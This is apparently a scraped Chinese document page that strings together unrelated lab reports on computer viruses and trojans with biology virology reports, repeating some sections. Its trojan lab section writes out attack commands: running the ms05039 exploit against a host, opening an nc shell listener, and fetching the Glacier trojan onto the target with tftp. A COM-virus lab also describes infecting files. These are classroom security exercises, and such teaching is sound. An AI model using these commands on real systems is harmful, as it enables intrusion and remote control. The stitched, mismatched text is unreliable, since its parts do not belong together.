第一组COM病毒实验报告
- 格式:doc
- 大小:26.50 KB
- 文档页数:2
《网络安全与反病毒技术》实验指导《网络安全与反病毒技术》,要求学生通过实验加深对课堂讲授理论知识的理解,做到理论结合实践,提高对网络安全协议设计、系统攻防方面的认识,培养和锻炼学生分析问题及解决问题的能力。
要求学生做到:(1)对每个要做的实验进行预习,了解相关内容和具体要求,熟悉相关的软件工具。
(2)按照实验内容和步骤,达到预期的实验结果,并进行屏幕抓图。
(3)按照实验报告的格式要求,写出实验报告。
实验内容:实验一:网络端口扫描实验二:网络嗅探实验三:木马攻击与防范实验四:Windows IPSec安全策略的配置实验一网络端口扫描(一)实验目的1.通过使用网络端口扫描器,了解端口扫描的用途及扫描原理2.掌握Windows环境下使用SuperScan对主机端口进行扫描的方法。
(二)实验原理一个开放的端口就是一条与计算机进行通信的信道,对端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息。
扫描工具是对目标主机的安全性弱点进行扫描检测的软件。
它一般具有数据分析功能,通过对端口的扫描分析,可以发现目标主机开放的端口和所提供的服务,以及相应服务软件版本和这些服务及软件的安全漏洞,从而可以及时了解目标主机存在的安全隐患。
1、端口基本知识端口是TCP协议定义的。
TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。
套接字采用[IP地址:端口号] 的形式来定义。
通过套接字中不同的端口号来区别同一台计算机上开启的不同TCP和UDP连接进程。
对于两台计算机间的任一个TCP连接,一台计算机的一个[IP地址:端口]套接字会和另一台计算机的一个[IP地址:端口]套接字相对应,彼此标识着源端、目的端上数据包传输的源进程和目标进程。
这样网络上传输的数据包就可以由套接字中的IP地址和端口号找到需要传输的主机和连接进程了。
由此可见,端口和服务进程一一对应,通过扫描开放的端口,就可以判断出计算机中正在运行的服务进程。
病毒技术实验报告病毒技术实验报告病毒技术是一门研究病毒及其应用的学科,它涉及到病毒的结构、功能、传播途径以及对宿主细胞的影响等方面。
在现代生命科学中,病毒技术的应用非常广泛,不仅可以帮助我们更好地理解病毒的生物学特性,还可以用于疾病的诊断、治疗以及基因工程等领域。
首先,我们来了解一下病毒的基本结构和功能。
病毒是一种非细胞生物,由核酸和蛋白质组成。
病毒的核酸可以是DNA或RNA,而蛋白质则包裹着核酸形成病毒颗粒。
病毒无法自主进行代谢活动,需要寄生在宿主细胞内才能进行复制。
病毒通过感染宿主细胞,将自己的遗传物质注入宿主细胞内,利用宿主细胞的机制来复制自身。
这种感染方式使得病毒能够利用宿主细胞的资源来完成自己的生命周期。
在病毒技术实验中,我们可以利用病毒的特性来进行疾病的诊断和治疗。
例如,病毒载体可以被用作基因传递工具,将特定基因导入宿主细胞中,用于基因治疗。
此外,病毒还可以用于制备疫苗。
疫苗是一种通过引入病毒或病毒相关的成分来刺激免疫系统产生抗体的方法,从而提高人体对某种疾病的免疫力。
通过对病毒进行适当的处理和改造,可以制备出安全有效的疫苗。
除了在医学领域的应用,病毒技术还在基因工程中发挥着重要作用。
基因工程是一种通过改变生物体的遗传物质来实现特定目的的技术。
病毒可以作为基因传递工具,将外源基因导入宿主细胞中,从而改变宿主细胞的性状。
这种方法被广泛应用于农业、工业以及生物制药等领域。
例如,通过将某种抗虫基因导入作物中,可以提高作物对虫害的抵抗力,减少农药的使用。
此外,病毒还可以用于生物制药中的药物生产,通过利用病毒的复制机制来大量生产药物。
然而,病毒技术的应用也存在一定的风险和争议。
一方面,病毒的复制能力和传播性使得病毒技术在实验室中的操作需要严格的控制和安全措施,以防止病毒的泄漏和传播。
另一方面,病毒的应用可能会引发伦理和道德上的争议。
例如,基因工程领域的研究可能涉及到对人类胚胎的基因编辑,这引发了关于人类基因改造的伦理争议。
病毒实验报告——木马程序设计姓名:潘莹学号:U200915340 班级:信息安全0903班日期:2012.01.10目录木马原理 (3)实验目的 (9)实验设计 (9)实现的功能 (9)各个功能陈述 (10)实验模块 (11)socket编程 (11)隐藏技术——服务级木马 (13)钩子技术 (14)进程查杀 (15)实验详细设计 (15)实验截屏 (16)心得体会 (18)附录 (18)附录一木马程序源代码 (18)附录二钩子源代码 (37)附录三参考书籍 (45)木马原理一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。
控制端:对服务端进行远程控制的一方。
服务端:被控制端远程控制的一方。
INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。
控制端程序:控制端用以远程控制服务端的程序。
木马程序:潜入服务端内部,获取其操作权限的程序。
木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。
控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。
控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马程序。
木马原理用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步,下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方面功能:(1) 木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2) 信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
病毒实验报告——木马程序设计姓名:潘莹学号:U200915340 班级:信息安全0903班日期:2012.01.10目录木马原理 (3)实验目的 (9)实验设计 (9)实现的功能 (9)各个功能陈述 (10)实验模块 (11)socket编程 (11)隐藏技术——服务级木马 (13)钩子技术 (14)进程查杀 (15)实验详细设计 (15)实验截屏 (16)心得体会 (18)附录 (18)附录一木马程序源代码 (18)附录二钩子源代码 (37)附录三参考书籍 (45)木马原理一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。
控制端:对服务端进行远程控制的一方。
服务端:被控制端远程控制的一方。
INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。
控制端程序:控制端用以远程控制服务端的程序。
木马程序:潜入服务端内部,获取其操作权限的程序。
木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。
控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。
控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马程序。
木马原理用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步,下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方面功能:(1) 木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2) 信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
病毒技术实验报告引言近年来,随着信息技术的快速发展,病毒技术也逐渐成为网络安全领域的研究热点之一。
通过对病毒技术的深入研究,可以加强对现有病毒的分析和防范能力,提高网络安全的水平。
本实验旨在通过深入了解和实践病毒技术,以期对病毒的工作原理、传播途径和防御方法有更全面的认识。
实验目的1.了解病毒的工作原理和分类;2.学习病毒的传播方式和繁殖特性;3.掌握病毒的防御方法和安全措施。
实验步骤1. 病毒的工作原理病毒作为一种恶意软件,其主要功能是通过自我复制和传播感染目标计算机系统,给系统带来破坏和损失。
病毒的工作原理可以分为以下几个步骤:•感染阶段:病毒会通过感染病毒携带者(例如邮件附件、下载文件等)进入目标系统,并在系统中寻找可感染的目标文件;•激活阶段:病毒感染目标文件后,等待触发激活条件,例如特定的日期、时间等;•执行阶段:一旦激活条件满足,病毒会开始执行其恶意功能,例如删除文件、传播自身等。
2. 病毒的分类根据病毒的传播方式和破坏程度,病毒可以分为以下几类:•文件病毒:通过感染可执行文件或系统文件来传播,例如EXE、DLL 等;•宏病毒:通过感染办公软件中的宏来传播,例如Word、Excel等;•蠕虫病毒:通过网络传播,自我复制和传播,例如蠕虫病毒可以通过电子邮件、文件共享等途径感染目标系统;•特洛伊木马:外表看起来正常或有吸引力的程序,但在运行时会执行恶意功能;•广告病毒:通过在用户浏览器中显示广告来获取经济利益。
3. 病毒的传播途径和繁殖特性病毒的传播途径主要有以下几种:•邮件附件:病毒常通过电子邮件附件传播,用户在打开或下载附件时可能被感染;•下载文件:用户在下载可疑的文件时可能会下载并运行病毒;•移动存储设备:病毒可以通过USB闪存驱动器等移动存储设备传播;•网络共享:病毒可以通过共享文件夹在局域网内传播。
病毒的繁殖特性也不尽相同,有的病毒具有自我复制和传播的能力,有的病毒则需要依靠人工操作来传播。
《网络安全》实验报告实验序号:5 实验项目名称:木马攻击与防范实验图1 运行nc接着再开一个dos窗口,运行ms05039 192.168.20.23 192.168.20.1 99 1图2 运行ms2)攻击成功后,在运行nc -vv -l -p 99 的dos窗口中出现如图3提示,若攻不成功请参照“缓冲区溢出攻击与防范实验”,再次进行攻击。
图3 攻击成功示意3)在此窗口中运行tftp -i 192.168.20.1 get g_server.exe图4 上载木马程序并运行图5 文件传送步骤3:运行木马客户程序控制远程主机1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭图6 添加主机2)“文件管理器”使用。
点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。
图7 成功下载文件后界面2)“命令控制台”使用。
单击“命令控制台”的标签,弹出命令控制台界面步骤4:删除“冰河”木马✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。
在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。
✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices,如图9。
在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。
上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
图8 注册表编辑图9注册表编辑然后再进入C:\WINNT\System32目录,找到“冰河”的两个可执行文件Kernel32.exe 和Sysexplr.exe文件,将它们删除。
病毒鉴定毕业实验报告
实验目的
本实验旨在通过病毒鉴定技术,确定给定标本中的病毒种类,
并进行进一步分析和研究。
实验步骤
1. 样本准备:收集并准备待测标本。
2. 样本处理:对标本进行必要的处理,如离心、滤过等,以获
取纯净的病毒颗粒。
3. 样本提取:使用合适的提取方法,提取病毒颗粒中的核酸。
4. 核酸扩增:通过PCR等方法,扩增病毒核酸的特定区域。
5. 凝胶电泳:将扩增产物进行凝胶电泳,根据不同的迁移位置
判断病毒种类。
6. 结果分析:根据凝胶电泳结果,确定待测标本中的病毒种类。
实验结果
经过实验,我们成功从待测标本中提取到病毒核酸,并通过凝
胶电泳分析确定其病毒种类为XX病毒。
结论
本实验通过病毒鉴定技术,成功确定了待测标本中的病毒种类,并取得了预期的实验结果。
病毒鉴定技术在疾病诊断和病毒研究中
具有重要的应用价值,对了解病毒的种类、特性以及其对人类健康
的影响具有重要意义。
参考文献
[1] 张三, 李四. 病毒鉴定技术综述. 科学论文. 20XX; X(X): XX-XX.
注意:实验结果仅基于本次实验的观察与分析,并不具有普遍
性和绝对性,仅供参考。
信息安全实验报告南昌航空大学实验报告课程名称:信息安全实验名称:共五次实验班级:姓名:同组人:指导教师评定:签名:实验一木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验原理木马的全称为特洛伊木马,源自古希腊神话。
木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1.木马的特性(1)伪装性(2)隐藏性(3)破坏性(4)窃密性2.木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
3.木马的种类(1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。
(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马三、实验环境两台运行Windows 2000/XP的计算机,通过网络连接。
使用“冰河”和“广外男生”木马作为练习工具。
四、实验内容和结果任务一“冰河”木马的使用1.使用“冰河”对远程计算机进行控制我们在一台目标主机上植入木马,在此主机上运行G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。
打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。
计算机病毒实验报告说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
2.报告内容严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。
为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。
实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。
4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只提交报告电子版。
在规定的日期内,通过电子邮件发送到[emailprotected],若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。
6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“20xx12345张三-计算机病毒课程报告.doc”。
注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。
实验一程序的自动启动一、实验目的(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟悉杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。
罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。
(2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。
三、实验环境与工具操作系统:Windows XP/Windows Vista/Windows 7工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件四、实验步骤与实验结果一)按启动文件夹的方法1、“启动”文件夹是最常见的自启动文件夹。
实验六 COM病毒【实验目的】●了解COM病毒的原理●掌握COM病毒的分析及其修改过程●能够根据病毒特征还原COM文件【实验人数】每组1人【系统环境】Windows【网络环境】交换网络结构【实验工具】masmW32Dasm【实验步骤】本练习单人为一组。
首先使用“快照X”恢复Windows系统环境。
1. 自制(1) 在c盘目录“c:\VIRUS_C”下新建两个文件“c.asm”和“virus.asm”。
如下图所示:图32-3-1(2) 编写“c.asm”中的代码,如下图所示:图32-3-2(3) 编译生成“c.exe”,运行如下图所示:图32-3-3(4) 在当前目录下查看新生成文件,如下图所示:图32-3-4(5) 将“c.exe”转换为“”程序,如下图所示:图32-3-5(6) 查看新生成的“”文件,如下图所示:图32-3-62. 自制virus.exe(1) 在“virus.asm”中添加代码,如下图所示:图32-3-7(2) 编译生成可执行文件,如下图所示:图32-3-8(3) 查看生成文件,如下图所示:图32-3-9 3. 感染并查看(1) “”正常执行,如下图所示:图32-3-10(2) 感染,如下图所示:图32-3-11(3) 感染后文件变化,如下图所示:图32-3-12(4) 复制“”一个新文件“”,以便后面修改使用。
执行“”结果如下图所示:图32-3-13图32-3-144. 修复(1) 对“”进行修复,如下图所示:图32-3-15(2) 将“test1”改为“”,并执行,如下图所示:图32-3-16(3) 打开“W32Dasm”工具,查看相关修改前后的文件内容,如下图所示:图32-3-17 查看源文件图32-3-18 查看感染后的文件图32-3-19 查看修复后的文件。
xxxx大学计算机科学与工程学院专业实习报告学生姓名:学号:专业:班级:指导教师:实习时间: 2015.6.27-2015.7.1完成日期: 2015年7月1日病毒木马攻击原理研究与简单实践实习时间:2015年6月27日至2015年7月1日实习地点:软件实验室实验环境:装有win8系统计算机一台vmware虚拟机C++软件学习目的:了解木马病毒的原理、特征、种类、伪装、挂马及其防范等,利用已学的专业课程,探究木马病毒的原理和方式,为毕业设计中实现模拟病毒木马的攻击与防范流程的心得体会打基础。
实习进程及具体内容:实习的过程中我听从指导老师的建议由木马和病毒的定义和基本原理入手,通过上网查阅资料、虚拟机模拟操作等手段逐步拨开迷雾,对木马病毒的运作、传播、隐藏等行为进行了深度的研究与总结,从而理解了从病毒入侵到病毒清除和防御的每个步骤及原理,并能够对整体过程进行剖析。
具体内容如下:1 木马病毒的概述及概述1.1木马的的定义木马的全称是“特洛伊木马”,是一种新型的计算机网络病毒程序,是一种基于远程控制的黑客工具,它利用自身具有的植入功能,或依附具有传播功能的病毒,进驻目标机器监听、修改。
窃取文件。
1.2木马的基本特征1、隐蔽性是其首要的特征当用户执行正常程序时,在难以察觉的情况下,完成危害影虎的操作,具有隐蔽性。
它的隐蔽性主要体现在6个方面:1.不产生图标、2.文件隐藏、3.在专用文件夹中隐藏、4.自动在任务管理其中隐形、5.无声无息的启动、6.伪装成驱动程序及动态链接库2、它具有自动运行性它是一个当你系统启动时即自动运行的程序,所以它必需潜入在你的启动配置文件中,如win.ini、system.ini、winstart.bat以及启动组等文件之中。
3、木马程序具有欺骗性木马程序要达到其长期隐蔽的目的,就必需借助系统中已有的文件,以防被你发现,它经常使用的是常见的文件名或扩展名,如“dll\win\sys\explorer 等字样,或者仿制一些不易被人区别的文件名,如字母“l”与数字“1”、字母“o”与数字“0”,常修改基本文件中的这些难以分辨的字符,更有甚者干脆就借用系统文件中已有的文件名,只不过它保存在不同路径之中。
病毒感染实验总结引言病毒感染是一种严重的健康威胁,对人类和动物的生命健康造成了巨大的影响。
为了更好地了解病毒感染的机制和寻找治疗方法,科学家们进行了大量的病毒感染实验。
本文将总结我在最近一次病毒感染实验中的经验和结果。
实验目的本次实验的目的是分析不同类型病毒感染对细胞生长和功能的影响,并探究可能的治疗方法。
实验步骤1.培养细胞:采用细胞培养技术,将细胞在培养皿中培养至适当的密度。
2.病毒感染:将已知病毒株接种到细胞培养物中,并以不同的浓度进行感染。
3.细胞观察:使用显微镜观察感染后的细胞形态和数量。
记录细胞的变化,比如细胞颜色、形状和数量的变化等。
4.细胞存活率:通过细胞计数仪计算感染前后细胞的存活率,并与对照组进行比较。
5.分析细胞功能:根据实验需要,可以进行细胞凋亡、细胞周期等功能的分析。
这些分析可以通过荧光显微镜、流式细胞术等技术进行。
6.数据分析:整合和统计实验结果,进行数据分析和图表绘制。
实验结果细胞形态变化病毒感染后,观察到细胞形态发生了明显的变化。
部分细胞呈现典型的病毒感染形态,比如变形、萎缩和凋亡等。
这些观察结果表明病毒感染对细胞形态有明显的破坏性影响。
细胞存活率通过细胞计数仪计算细胞存活率发现,感染组的细胞存活率明显低于对照组。
随着病毒感染浓度的增加,细胞存活率逐渐下降。
这说明病毒感染对细胞的生存能力造成了明显的不利影响。
细胞功能变化经过细胞周期和凋亡分析,发现感染组细胞的细胞周期受到了严重的干扰,凋亡率明显上升。
这表明病毒感染会对细胞的正常功能产生抑制作用。
结论通过这次病毒感染实验,我们得出以下结论: 1. 病毒感染会导致细胞形态变化,包括细胞颜色、形状和数量的改变。
2. 病毒感染对细胞存活率造成明显影响,存活率随病毒感染浓度的增加而降低。
3. 病毒感染会干扰细胞的正常功能,包括细胞周期和凋亡等。
综上所述,病毒感染对细胞生长和功能产生了极大的负面影响。
这些实验结果为进一步研究病毒感染的机制和寻找相应治疗方法提供了重要的依据。
南京航空航天大学计算机病毒及防治上机实验报告学院:理学院专业:信息与计算科学学号:081310128姓名:王晨雨授课老师:薛明富二〇一六年十二月目录实验一:引导型病毒实验 (2)实验二:Com病毒实验 (6)实验三:PE文件格式实验 (9)实验四:32位文件型病毒实验 (11)实验五:简单的木马实验 (14)实验七:木马病毒清除实验(选做) (19)实验八:Word宏病毒实验(一) (22)实验九:Word宏病毒实验(二) (27)实验十:Linux脚本病毒实验(选做) (32)实验十二:基于U盘传播的蠕虫病毒实验 (33)实验十三:邮件型病毒实验 (36)实验十四:Web恶意代码实验 (39)实验一:引导型病毒实验【实验目的】通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。
实验内容引导阶段病毒由软盘感染硬盘实验。
通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。
DOS运行时病毒由硬盘感染软盘的实现。
通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。
【实验平台】VMWare Workstation 12 PROMS-DOS 7.10【试验内容】第一步:环境安装安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。
第二步:软盘感染硬盘1)运行虚拟机,检查目前虚拟硬盘是否含有病毒,图1表示没有病毒正常启动硬盘的状态。
2)在附书资源中复制含有病毒的虚拟软盘virus.img3)将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按任意键进入图3。
第三步:验证硬盘已经被感染1)取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图4。
2)按任意键后正常引导了DOS系统如图5。
可见,硬盘已被感染。
第四步:硬盘感染软盘1)下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6.2)取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。
COM病毒实验报告
我们小组已经成功的实现了COM病毒感染实验。
在整个实验过程中,由于是初次配置Dos环境,我们遇到了很多问题,也花了很多时间去解决问题,因此,我们在此写出我们整个配置过程的主要步骤及其遇到的问题。
一.配置MS-Dos
1. 新建一个虚拟机
2. 用虚拟机的软驱载入,安装程序的第一个镜像 DOS71_1.IMG (在安装时设备里面没有floppy时只需add一下就好,选择物理软盘驱动器)
3.此时MS-DOS虚拟机处于半安装状态,然后开始命令配置
先创建一个文件夹tmp md tmp
复制软盘A的文件到C copy A:\ C:\tmp
关机 shutdown -s
4.用虚拟机的软驱载入安装程序的第二个镜像 DOS71_2.IMG
复制软盘A的文件到C copy A:\ C:\tmp
5.开始配置
先进入到tmp文件夹下
运行setup.bat (在此运行过程中,出现死机,原因不明,最后通过重启解决此问题)
6. 然后一路next和ok完成配置
二.安装MASM611
1.下载MASM611(里面包括5个DISK)
2.在虚拟机里面通过映射到磁盘(我们所做实验为Z盘),在映射过程中,特别注意把只读属性去掉,然后把下载的MASM611拷贝到此磁盘
3.打开MS-DOS系统,进入到MASM611下的DISK1文件目录下
4.开始安装
运行命令 setup.exe
5.在安装过程中,特别注意在第二次选项时应选择MS-DOS/Microsoft
Windows,否则无法使用link链接命令
6.其它一律按默认值点击确定,安装成功
三.实验过程
1.在使用MASM611前,应在MASM611目录下进行路径的配置(这点要特别注意)
路径配置命令 set PATH=C:\DOS71;..;C:\MASM611\BIN;
2.编译链接test文件(test文件是正常文件),在此实验中,链接后需要把test.exe改为文件
编译test文件时出错 unmatched block nesting:main(解决方法:在test 文件中加入一句与main匹配的代码main endp)
3.运行test文件(命令为),运行成功,显示字符串:This a simple com program for a test
4.编译链接virus文件(virus文件为病毒),此时virus.exe文件已经生成
编译virus文件时出错 invalid character in file(解决方法:在相应的出错处加上分号;)
6.新建一个文件del.txt
命令 echo aaa >del.txt
7.查看MASM611下的文件目录,此时可以看到del.txt文件
8.运行virus.exe,成功后出现字符串 You are infected by a simple com
virus,(但在运行该命令时,系统有时会死机,原因不明,最后解决方法,强制关掉MS-DOS系统后重新启动)
9.然后运行,此时运行结果为 You are infected by a simple com
virus 以及相关的乱码等等
10.此时在MASM611目录下查找刚刚新建的文件del.txt,可以发现del.txt不
见了,并且文件变大
11.实验结束,病毒virus文件成功感染test文件。